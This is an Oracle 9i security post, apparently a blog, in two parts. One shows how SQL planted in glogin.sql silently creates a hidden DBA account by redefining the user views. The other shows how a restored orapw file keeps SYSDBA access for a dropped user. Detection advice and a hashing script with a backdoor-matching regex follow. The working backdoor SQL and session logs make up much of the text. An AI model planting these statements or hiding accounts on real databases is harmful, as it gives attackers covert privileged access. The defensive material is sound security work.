Some SQL command files are executed automatically when a user logs on to the database, such as glogin.sql/login.sql for SQL*Plus and toad.ini for TOAD. A cracker who can modify these files can add statements that create users, escalate privileges, change data, and so on. The following demo illustrates this.
Modify glogin.sql and add the following statements. They serve two purposes: create a user with the DBA privilege, and recreate the views dba_users and all_users so that this user is hidden from queries against them.
set term off
create user cracker identified by cracker;
grant dba to cracker;
CREATE OR REPLACE FORCE VIEW "SYS"."ALL_USERS" ("NAME", "USER#", "CTIME") AS
… …
and u.name != 'CRACKER';
CREATE OR REPLACE FORCE VIEW "SYS"."DBA_USERS" ("USERNAME", "USER_ID", "PASSWORD", "ACCOUNT_STATUS", "LOCK_DATE", "EXPIRY_DATE", "DEFAULT_TABLESPACE", "TEMPORARY_TABLESPACE", "CREATED", "PROFILE", "INITIAL_RSRC_CONSUMER_GROUP", "EXTERNAL_NAME") AS
… …
and u.name != 'CRACKER';
set term on
Then log on to the database as the SYS user.
[oracle@chen admin]$ sqlplus
SQL*Plus: Release 9.2.0.4.0 - Production on Thu Jan 10 11:07:06 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Enter user-name: /as sysdba
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
sys@CHEN>select name from all_users;
NAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>select username from dba_users;
USERNAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>conn cracker/cracker
Connected.
sys@CHEN>select name from sys.user$ where TYPE#<>0 minus select username from dba_users;
NAME
------------------------------
CRACKER
Recommendations
1. Check the glogin.sql/login.sql/toad.ini files for modification;
2. Check the SQLPATH search sequence;
3. If possible use SQL*Plus <10g, because there (g)login.sql is only executed at the first login;
4. Use /nolog as the SQL*Plus startup parameter; (g)login.sql is then not executed with SQL*Plus <10g.
5. Use OS tools to track changes to these files, such as md5sum/sha1sum on Linux.
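An added example, not part of the original post, showing how recommendations 1, 2 and 5 can be scripted: it hashes the site profile glogin.sql, every login.sql on the SQLPATH search order and the password file, keeps a baseline, reports any change, and flags statements like the ones the demo plants. The file locations ($ORACLE_HOME/sqlplus/admin/glogin.sql, $ORACLE_HOME/dbs/orapw$ORACLE_SID), the use of sha256sum and the script name login_audit.sh are assumptions, not something the post specifies.

```shell
#!/bin/sh
# Added example (not from the original post): baseline and verify the files
# SQL*Plus runs at login. Assumptions: POSIX sh with sha256sum, grep -E and
# diff; glogin.sql under $ORACLE_HOME/sqlplus/admin; login.sql searched in the
# current directory and then in each SQLPATH entry; password file at
# $ORACLE_HOME/dbs/orapw$ORACLE_SID.

# Statements that have no business in a login script: the demo above uses
# exactly these to plant a DBA account and hide it behind replaced views.
SUSPICIOUS_RE='create[[:space:]]+user|grant[[:space:]]+(dba|sysdba|sysoper)|create[[:space:]]+(or[[:space:]]+replace[[:space:]]+)?(force[[:space:]]+)?view|^[[:space:]]*set[[:space:]]+term(out)?[[:space:]]+off'

# Directories SQL*Plus consults for login.sql, in search order:
# current directory first, then each colon-separated SQLPATH entry.
login_script_dirs() {
    printf '%s\n' "$PWD"
    printf '%s\n' "${SQLPATH:-}" | tr ':' '\n' | sed '/^$/d'
}

# Hash every login-time file that currently exists: the site profile, each
# login.sql on the search path and, if ORACLE_SID is set, the password file.
current_hashes() {   # $1 = ORACLE_HOME
    if [ -f "$1/sqlplus/admin/glogin.sql" ]; then
        sha256sum "$1/sqlplus/admin/glogin.sql"
    fi
    login_script_dirs | while read -r d; do
        if [ -f "$d/login.sql" ]; then
            sha256sum "$d/login.sql"
        fi
    done
    if [ -n "${ORACLE_SID:-}" ] && [ -f "$1/dbs/orapw$ORACLE_SID" ]; then
        sha256sum "$1/dbs/orapw$ORACLE_SID"
    fi
}

# Record a known-good baseline; run this right after a clean install or review.
baseline_login_scripts() {   # $1 = ORACLE_HOME, $2 = baseline file to write
    current_hashes "$1" | sort > "$2"
}

# Compare the current state with the baseline. Prints the differences
# (changed hashes, files that appeared or vanished) and returns 1 on any
# change, 0 when everything still matches.
verify_login_scripts() {   # $1 = ORACLE_HOME, $2 = baseline file
    current_hashes "$1" | sort | diff "$2" -
}

# Number of lines in a login script that match the high-risk patterns.
suspicious_count() {   # $1 = file
    grep -c -i -E "$SUSPICIOUS_RE" "$1" || true
}

# Standalone usage (hypothetical script name):
#   login_audit.sh baseline /opt/app/oracle/product/9.2.0 ~/login.baseline
#   login_audit.sh verify   /opt/app/oracle/product/9.2.0 ~/login.baseline
case "${1:-}" in
    baseline) baseline_login_scripts "$2" "$3" ;;
    verify)
        login_script_dirs | while read -r d; do
            if [ -f "$d/login.sql" ] && [ "$(suspicious_count "$d/login.sql")" != "0" ]; then
                echo "WARNING: high-risk statements in $d/login.sql"
            fi
        done
        verify_login_scripts "$2" "$3" || echo "BASELINE MISMATCH (see diff above)"
        ;;
esac
```

The baseline must be stored somewhere the oracle OS account cannot write, otherwise whoever can edit glogin.sql can also refresh the baseline; a verify run that reports a mismatch is the cue to read the changed file line by line, not just to re-baseline it.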
Orapw file issue
sys@CHEN>create user hacker identified by hacker;
User created.
sys@CHEN>grant sysdba to hacker;
Grant succeeded.
[admin@chen ~]$ sqlplus "hacker/hacker@chen as sysdba"
SQL*Plus: Release 9.2.0.8.0 - Production on Tue Mar 4 22:24:22 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
sys@CHEN>
sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen /opt/app/oracle/product/9.2.0/dbs/orapwchen.org
sys@CHEN>drop user hacker;
User dropped.
sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen.org /opt/app/oracle/product/9.2.0/dbs/orapwchen
sys@CHEN>select name from user$ where type#<>0;
NAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>select * from v$pwfile_users;
USERNAME SYSDB SYSOP
------------------------------ ----- -----
SYS TRUE TRUE
HACKER TRUE FALSE
sys@CHEN>select VIEW_DEFINITION from v$fixed_view_definition where VIEW_NAME='GV$PWFILE_USERS';
VIEW_DEFINITION
--------------------------------------------------------------------------------------------------------------------------------------------
select inst_id,username,decode(sysdba,1,'TRUE','FALSE'), decode(sysoper,1,'TRUE','FALSE') from x$kzsrt where valid=1 and username != 'INTERNAL'
[admin@chen ~]$ sqlplus "hacker/hacker@chen as sysdba"
SQL*Plus: Release 9.2.0.8.0 - Production on Tue Mar 4 22:27:19 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
sys@CHEN>
Even though the user HACKER was dropped from the database, it can still log on as SYSDBA as long as it exists in the orapw file. The user can also be hidden from gv$pwfile_users by changing that view's definition, which is hard-coded in the oracle binary, to the following statement. A comparison of v$pwfile_users against dba_users, and of the gv$pwfile_users definition against a known-good copy, is therefore worth including in a routine check.
select inst_id,username,decode(sysdba,1,'TRUE','FALSE'), decode(sysoper,1,'TRUE','FALSE') from x$kzsrt where username not in ('INTERNAL','HACKER')